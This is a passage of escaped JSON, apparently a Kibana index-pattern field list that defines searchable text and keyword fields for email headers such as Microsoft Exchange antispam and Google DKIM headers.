\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-index\"}}},{\"name\":\"thread-topic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-topic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-topic\"}}},{\"name\":\"to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"to\"}}},{\"name\":\"x-account-notification-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-account-notification-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-account-notification-type\"}}},{\"name\":\"x-eopattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eopattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eopattributedmessage\"}}},{\"name\":\"x-eoptenantattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eoptenantattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eoptenantattributedmessage\"}}},{\"name\":\"x-forefront-antispam-report-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-forefront-antispam-report-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-forefront-antispam-report-untrusted\"}}},{\"name\":\"x-gm-message-state\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-gm-message-state.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-gm-message-state\"}}},{\"name\":\"x-google-dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-dkim-signature\"}}},{\"name\":\"x-google-smtp-source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-smtp-source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-smtp-source\"}}},{\"name\":\"x-incomingheadercount\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingheadercount.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingheadercount\"}}},{\"name\":\"x-incomingtopheadermarker\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingtopheadermarker.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingtopheadermarker\"}}},{\"name\":\"x-message-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-delivery\"}}},{\"name\":\"x-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-info\"}}},{\"name\":\"x-microsoft-antispam\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-mailbox-delivery\"}}},{\"name\":\"x-microsoft-antispam-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info-original\"}}},{\"name\":\"x-microsoft-antispam-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info\"}}},{\"name\":\"x-microsoft-antispam-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-prvs\"}}},{\"name\":\"x-microsoft-antispam-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-untrusted\"}}},{\"name\":\"x-microsoft-antispam.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata-original\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata\"}}},{\"name\":\"x-ms-exchange-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-authentication-results\"}}},{\"name\":\"x-ms-exchange-crosstenant-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authas\"}}},{\"name\":\"x-ms-exchange-crosstenant-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authsource\"}}},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-fromentityheader\"}}},{\"name\":\"x-ms-exchange-crosstenant-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-network-message-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalarrivaltime\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\"}}},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\"}}},{\"name\":\"x-ms-exchange-eopdirect\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-eopdirect.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-eopdirect\"}}},{\"name\":\"x-ms-exchange-minimumurldomainage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-minimumurldomainage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-minimumurldomainage\"}}},{\"name\":\"x-ms-exchange-organization-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authas\"}}},{\"name\":\"x-ms-exchange-organization-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authsource\"}}},{\"name\":\"x-ms-exchange-organization-expirationinterval\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationinterval.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationinterval\"}}},{\"name\":\"x-ms-exchange-organization-expirationintervalreason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationintervalreason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationintervalreason\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttime\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttimereason\"}}},{\"name\":\"x-ms-exchange-organization-messagedirectionality\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-messagedirectionality.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-messagedirectionality\"}}},{\"name\":\"x-ms-exchange-organization-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-network-message-id\"}}},{\"name\":\"x-ms-exchange-organization-pcl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-pcl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-pcl\"}}},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-recordreviewcfmtype\"}}},{\"name\":\"x-ms-exchange-organization-scl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-scl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-scl\"}}},{\"name\":\"x-ms-exchange-processed-by-bccfoldering\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-processed-by-bccfoldering.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-processed-by-bccfoldering\"}}},{\"name\":\"x-ms-exchange-senderadcheck\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-senderadcheck.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-senderadcheck\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheaderspromoted\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstamped\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstripped\"}}},{\"name\":\"x-ms-exchange-transport-endtoendlatency\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-endtoendlatency.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-endtoendlatency\"}}},{\"name\":\"x-ms-exchange-transport-forked\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-forked.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-forked\"}}},{\"name\":\"x-ms-has-attach\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-has-attach.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-has-attach\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id-prvs\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id\"}}},{\"name\":\"x-ms-oob-tlc-oobclassifiers\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-oob-tlc-oobclassifiers.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-oob-tlc-oobclassifiers\"}}},{\"name\":\"x-ms-publictraffictype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-publictraffictype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-publictraffictype\"}}},{\"name\":\"x-ms-tnef-correlator\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-tnef-correlator.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-tnef-correlator\"}}},{\"name\":\"x-ms-traffictypediagnostic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-traffictypediagnostic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-traffictypediagnostic\"}}},{\"name\":\"x-ms-userlastlogontime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-userlastlogontime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-userlastlogontime\"}}},{\"name\":\"x-msametadata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msametadata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msametadata\"}}},{\"name\":\"x-msapipeline\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msapipeline.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msapipeline\"}}},{\"name\":\"x-notifications\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-notifications.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":